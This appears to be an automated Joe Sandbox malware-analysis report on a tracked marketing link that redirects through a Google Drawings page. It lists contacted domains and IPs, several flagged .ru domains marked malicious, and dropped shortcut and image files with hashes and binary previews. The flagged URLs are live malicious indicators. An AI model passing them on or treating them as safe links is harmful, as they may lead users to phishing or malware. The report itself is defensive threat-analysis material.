                                                                          high
                                                                          https://dva.dgkifyron.ru/ncn6/#strue
                                                                            unknown
                                                                            https://docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1false
                                                                              high
                                                                              https://a.nel.cloudflare.com/report/v4?s=98Y9vMEODaOr0vyIkJLQCSB%2F%2Fc4eQE%2BgeiJuNcrNJXdrZeHD%2FSGiWJR4bhp72jqXe9EDeOJGNED1VzeSsnvvyPU5LqC9%2F%2FLKxqb8D7hQN4I7Sya2Gc1ycrL9iPVe5A%3D%3Dfalse
                                                                                high
                                                                                https://gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru/evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWKfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.jsfalse
                                                                                  high
                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://cdnjs.cloudflare.com/ajax/libs/mathjax/chromecache_164.1.dr, chromecache_175.1.drfalse
                                                                                    high
                                                                                    https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=chromecache_164.1.dr, chromecache_175.1.drfalse
                                                                                      high
                                                                                      http://github.com/requirejs/almond/LICENSEchromecache_152.1.drfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        13.107.246.63
                                                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                        104.18.94.41
                                                                                        challenges.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        142.250.181.132
                                                                                        www.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.67.214.93
                                                                                        dva.dgkifyron.ruUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        35.190.80.1
                                                                                        a.nel.cloudflare.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        142.250.181.65
                                                                                        googlehosted.l.googleusercontent.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.217.19.238
                                                                                        docs.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.21.32.1
                                                                                        gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ruUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.18.95.41
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        151.101.2.137
                                                                                        code.jquery.comUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        239.255.255.250
                                                                                        unknownReserved
                                                                                        unknownunknownfalse
                                                                                        142.250.181.14
                                                                                        unknownUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        15.157.143.48
                                                                                        recipsdm-campaign-pod8-960921543.ca-central-1.elb.amazonaws.comUnited States
                                                                                        71HP-INTERNET-ASUSfalse
                                                                                        IP
                                                                                        192.168.2.16
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1577107
                                                                                        Start date and time:2024-12-18 02:09:23 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 4m 19s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                        Sample URL:http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:13
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal60.win@22/136@52/14
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.206, 64.233.163.84, 199.232.214.172, 172.217.17.46, 142.250.181.99, 172.217.19.10, 142.250.181.106, 172.217.17.74, 172.217.19.202, 216.58.208.234, 172.217.19.234, 142.250.181.74, 142.250.181.138, 172.217.21.42, 172.217.17.42, 172.217.17.35, 13.107.6.156, 2.16.158.169, 2.16.158.170, 23.195.61.233, 20.190.147.12, 20.190.147.11, 20.190.147.6, 20.190.147.8, 20.190.177.23, 20.190.147.9, 20.190.147.5, 20.190.147.10, 20.199.58.43, 20.20.44.97, 20.20.44.160, 20.20.44.224, 52.109.68.87, 104.121.26.245, 23.206.197.16, 23.206.197.17, 104.116.245.11, 2.16.158.137, 23.195.62.26, 20.12.23.50
                                                                                        • Excluded domains from analysis (whitelisted): europe.ocws1.live.com.akadns.net, ssl.gstatic.com, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, ak.privatelink.msidentity.com, prod.ocws1.live.com.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, star-azurefd-prod.trafficmanager.net, update.googleapis.com, shell.cdn.office.net, ags.privatelink.msidentity.com, san-ion.secure4.scene7.com.edgekey.net, e40491.dscg.akamaiedge.net, www.tm.prd.ags.akadns.net, fs.microsoft.com, content-autofill.googleapis.com, portal-office365-com.b-0004.b-msedge.net, e19254.dscg.akamaiedge.net, shell.cdn.office.net-c.edgekey.net.globalredir.akadns.net, edgedl.me.gvt1.com, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, amcdnmsftuswe.azureedge.net, nel.measure.office.net.edgesuite.net, owamail.public.cdn.office.net.edgekey.net.globalredir.akadns.net, osiprod-frc-flax-azsc-000.francecentral.cloudapp.azure.com, clients.l.google.com, appsforoffice.microsoft.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1
                                                                                        No simulations
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 00:09:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2673
                                                                                        Entropy (8bit):3.9831475427115213
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:8+doTMo7H8OidAKZdA1FehwiZUklqeh3y+3:8pvA88y
                                                                                        MD5:048358DF7D42D39AAC26C0393090A7C6
                                                                                        SHA1:AA3AAA354AA5516DDE1F86232CCADEA1A633A8D1
                                                                                        SHA-256:C4F98366DD86C271B7D2D91994C663512E6C6433BB3CC21038D2CAE2F64A73DD
                                                                                        SHA-512:485E643630C92B3B87D1471138E096742C545C1CC16D0AEAAE8DFB53084B88EB63183C223F9A3060C3C6D8B78C8F2E0ECA37E213EFA43B06BF305EFF37134024
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:L..................F.@.. ...$+.,.....+...P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y3.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y;.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y;.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y;............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N..r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 00:09:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2675
                                                                                        Entropy (8bit):4.000038898201942
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:89doTMo7H8OidAKZdA1seh/iZUkAQkqehsy+2:84vAy9Qly
                                                                                        MD5:E86A2BE9C07610790F51E6D4146978D8
                                                                                        SHA1:DB95F1A1B67EC5C8F5A58CB6A7533735E1D015B4
                                                                                        SHA-256:DB7988EEC86FFA5EBD9DB176015B11C5992F895BE79C59790B4520E1C321A4AF
                                                                                        SHA-512:8F61C6F0B513AF3C158D0568A84E9C570D795D5F2BA4B0EB9F6DBE8714E60DB5F163F1C48E05D12AA175B6D3ED37EA6435166A5766FCD629223AB9586172E6C5
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:L..................F.@.. ...$+.,....qD...P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y3.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y;.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y;.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y;............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N..r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2689
                                                                                        Entropy (8bit):4.00723336673358
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:81doTMoAH8OidAKZdA14meh7sFiZUkmgqeh7syy+BX:8Qvzmngy
                                                                                        MD5:FAD6927CEF5597A53C6AED3CB6C3E214
                                                                                        SHA1:C5F6F519205D3201148AA4D5040AA245C48B3A0F
                                                                                        SHA-256:FA7CC6D542116314DD18DD2DB0CD74D663AE3162233D350D81507A0D1AA950E8
                                                                                        SHA-512:537DD8B931E07AA32EFFD8022FE9FC6C681785E7922A7125CF519A93FD8C070BE3F18DD411AD6BF72FF06E820D27A3A1449F2E21CFAE9584272D1EC55C986D00
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y3.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y;.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y;.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y;............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N..r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 00:09:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2677
                                                                                        Entropy (8bit):4.000522608981361
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:8MdoTMo7H8OidAKZdA1TehDiZUkwqeh4y+R:8PvApKy
                                                                                        MD5:D82542AA64D871D8523E281CC83A0BE6
                                                                                        SHA1:3872877C79AE611EB1125D2F9283F75568D0F53B
                                                                                        SHA-256:384DDF1101CFCBBB759EB374E0E01021D6885D8DB8DB7DC9533958B605CAA6AE
                                                                                        SHA-512:7973293993FABFDA92975926907A54109D5D8EB553564E1F656094FBBC7E317A7DDC7CE2EA86D37DD52BDFD19A8603B681A7DBECC4ADBFCA9C88B71BEE897CCF
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:L..................F.@.. ...$+.,........P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y3.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y;.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y;.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y;............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N..r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 00:09:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2677
                                                                                        Entropy (8bit):3.987401494178594
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:8LdoTMo7H8OidAKZdA1dehBiZUk1W1qehmy+C:8GvA59Gy
                                                                                        MD5:08B9A7E2DAABF803C417E027811C4DFE
                                                                                        SHA1:761A199B97A9EF7D57FFCA4B3264EFCFB62E86DA
                                                                                        SHA-256:A966D88A653B2DFF2017AA8ABF7AA4ED69940CA41520A68F18695EDEC1867343
                                                                                        SHA-512:0E10EE451C240F6FAADA61D88A3F47209461BB67594C5F4CFDCA0FEADCECD0991AF4FA73126E263E49793BA92714C6783B7729D9020CD31BF1409395E0E220F4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:L..................F.@.. ...$+.,.........P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y3.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y;.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y;.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y;............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N..r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 00:09:55 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):2679
                                                                                        Entropy (8bit):3.99503979055838
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:84doTMo7H8OidAKZdA1duTeehOuTbbiZUk5OjqehOuTbgy+yT+:87vABTfTbxWOvTbgy7T
                                                                                        MD5:411C4F39574AA63E412E3001BA962EEA
                                                                                        SHA1:38998F1E0D9212841D8376795369DFFB1BCEE87E
                                                                                        SHA-256:83C2FA608A16B9A2606C69F4D932E0281CAAB9917374FAFB23F9E4D3AC520DA7
                                                                                        SHA-512:DB8D1C470BAE2879B58FB5903B2EF5148EA382053380CE1926E5B43E7E45E176C5C1D8647370983BD9B33C489F273BB98CC3486F2788EC4D2FD007DAF324AFD4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:L..................F.@.. ...$+.,....X....P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y3.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y;.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y;.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y;............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N..r.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1059 x 736, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):421343
                                                                                        Entropy (8bit):7.9930283068921435
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:CzhXKcW0EjM7MmgItOOh5SdW8fgmAGbvEG:Czh6tI7MmqA5OW8fgfGbvT
                                                                                        MD5:5EEEC8E6F540AAC271BB6D8BD113115A
                                                                                        SHA1:B3256E64A78DD1A5CF6173ED958F69BC09E7E885
                                                                                        SHA-256:434138E6620D458BEC6FB1F53DF26AAF6F57B4FDBDF14ED2EA03EDDF642A156A
                                                                                        SHA-512:6D464624DA20CCE660174494492E14593E3A6765C4D01C223F68C38999BC83EF70E8E1BFD374EAE33295927C1B6A28F69716BBDA20591B2C31AE39C8F4EF7A49
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...#................pHYs.........&.:4....sRGB.........gAMA......a...mtIDATx...[..q..w..y.o.=..Y3...[V..(.v.;R..m......cN....NU@q.....*.....*...@QI.(.!P.sp..%.$.f.....Y........D....Z..}.{x......>,.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z.h.E..-Z...$.E..}5....-Z.h.E..N.Z....h.F..^.I{...b.._._~}....}.^}...?.o...U>?|...W..w/|=..|..}...g......./...x.s......=..~..........g.Q<.....}...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1699 x 1181, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):793073
                                                                                        Entropy (8bit):7.9926326015445595
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:zzR6wui4acRTYbntjQHv/6/nIz78wWDgqzMv0RxvAL+YopRvJl9JsG4VF5Rq5:zzRe+cRTY7+HKKASMRO+X3RJsGeg
                                                                                        MD5:979FF0DCE1EDA2035552AD1AA4EFACFA
                                                                                        SHA1:5765B464F4C94028C4D7492159E2B584DDE8E357
                                                                                        SHA-256:5979E07897CC0115AC1F320D880B419BF59185B8E6C7BCC75011784E90EA1FEF
                                                                                        SHA-512:623737D9A6493C87C6EE0765A8880AB3E1C1A67E674C3B4AA908049DE34CBC3D1A899BA1B6C644B881490453DD9067953F3AD00E5E335F872E5CB1AE30EEC244
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-5-mreb-979ff0dce1.png
                                                                                        Preview:.PNG........IHDR...............&.....pHYs.................sRGB.........gAMA......a.....IDATx...Y.ui~..k.............l..H....K.`.T...!..Yv.... .$... ... 7....A`...A,..e....bsR.U.Mg..Z+..<.w.]...Uu.2).......^k....L..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1143 x 794, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):383270
                                                                                        Entropy (8bit):7.988693191327277
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:TPRLLUNp5X4PgHMt6rH4wJKdPUQ8hR8YXR+JQKFTRvMqtpKyg9N/hTWjrA3S1SmI:hYNTIP/wJuMQ8hR8YXR+JQK3gz/JGA3t
                                                                                        MD5:7B89E7B9A1E5F0E2AD529D5A85E1ACB7
                                                                                        SHA1:304ECC4375129D905E70AFE830E998470DADECD9
                                                                                        SHA-256:1329D493F7D313CA0026EB2664D1AACECBCA82D5BE70F692DD61C980F3BB16BE
                                                                                        SHA-512:F35C28AC263F1C8A16385D6624D33D0EBCA72F0F959DA654C5B552D5B23EDF41A16D922A9FB6AAFD408AF7E2721D42C0145D99E6B8BC462679FADBEF2C484BA4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...w..........b......pHYs.........&.:4....sRGB.........gAMA......a....IDATx...{.o.U....~.q.>.z.....*W...1.1...$.N...L...%...*.)..{...J]....i!.-uh!ZJB......4j.....@$l.:..7.....5z.5.s......~.:...~.S..[k..Zk....5.D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1409 x 979, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):1074513
                                                                                        Entropy (8bit):7.992502130294777
                                                                                        Encrypted:true
                                                                                        SSDEEP:24576:Z5bdLk74D3xyaSraAjS7kyTxnkExgpDUPJ2NNu:ZHL9DhZSrbjSQy1mpQPJ2q
                                                                                        MD5:86723A74CC0FCAD23D9BF25A8EC33CAC
                                                                                        SHA1:24579C0CD153ED5B5856520E8B91FB2A61DEE8B3
                                                                                        SHA-256:CC6DEB15D98EE0D2F63E0FB260700C6579394AB15BC09CBB4B11ED925F701EF7
                                                                                        SHA-512:F2D60AC241146C08FF92AD548A111F5794321FBB04F70176D8187D38D89F7862D7F3D841DBA4C8138DA7C591897050040BC39EFE3CD4ACBFF1798ACF05E0AF82
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-edu-4-mreb-86723a74cc.png
